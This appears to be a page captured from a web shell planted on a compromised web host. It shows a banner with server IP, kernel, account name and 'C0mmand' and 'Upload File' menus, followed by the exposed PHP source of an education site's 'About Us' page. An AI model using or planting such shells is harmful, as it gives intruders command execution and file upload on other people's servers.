Server IP : 103.53.40.154 / Your IP : 3.145.89.89 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/bsaec.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <head> <meta charset="utf-8"> <title>Dhirati Education</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> <?php include 'top-link.php';?> </head> <body> <?php include 'header.php';?> <!-- Page Header Start --> <div class="container-fluid page-header py-6 my-6 mt-0 wow fadeIn" data-wow-delay="0.1s"> <div class="container text-center"> <h1 class="display-4 text-white animated slideInDown mb-4">About Us</h1> <nav aria-label="breadcrumb animated slideInDown"> <ol class="breadcrumb justify-content-center mb-0"> <li class="breadcrumb-item"><a class="text-white" href="#">Home</a></li> <li class="breadcrumb-item"><a class="text-white" href="#">Pages</a></li> <li class="breadcrumb-item text-primary active" aria-current="page">About</li> </ol> </nav> </div> </div> <!-- Page Header End --> <!-- About Start --> <?php include 'index-about.php';?> <!-- About End --> <!-- Team Start --> <?php include 'team.php';?> <!-- Team End --> <section class="contact-form"> <div class="container"> <div class="row"> <div class="col-lg-8 my-6 mb-0 wow fadeInUp" data-wow-delay="0.1s"> <div class="bg-primary text-center p-5"> <h1 class="mb-4">Make Appointment</h1> <form> <div class="row g-3"> <div class="col-sm-6"> <div class="form-floating"> <input type="text" class="form-control border-0" id="gname" placeholder="Gurdian Name"> <label for="gname">Your Name</label> </div> </div> <div class="col-sm-6"> <div class="form-floating"> <input type="email" class="form-control border-0" id="gmail" placeholder="Gurdian Email"> <label for="gmail">Your Email</label> </div> </div> <div class="col-sm-6"> <div class="form-floating"> <input type="text" class="form-control border-0" id="cname" placeholder="Child Name"> <label for="cname">Courses Type</label> </div> </div> <div class="col-sm-6"> <div class="form-floating"> <input type="text" class="form-control border-0" id="cage" placeholder="Child Age"> <label for="cage">Car Type</label> </div> </div> <div class="col-12"> <div class="form-floating"> <textarea class="form-control border-0" placeholder="Leave a message here" id="message" style="height: 100px"></textarea> <label for="message">Message</label> </div> </div> <div class="col-12"> <button class="btn btn-dark w-100 py-3" type="submit">Submit</button> </div> </div> </form> </div> </div> </div> </div> </section> <?php include 'footer.php';?>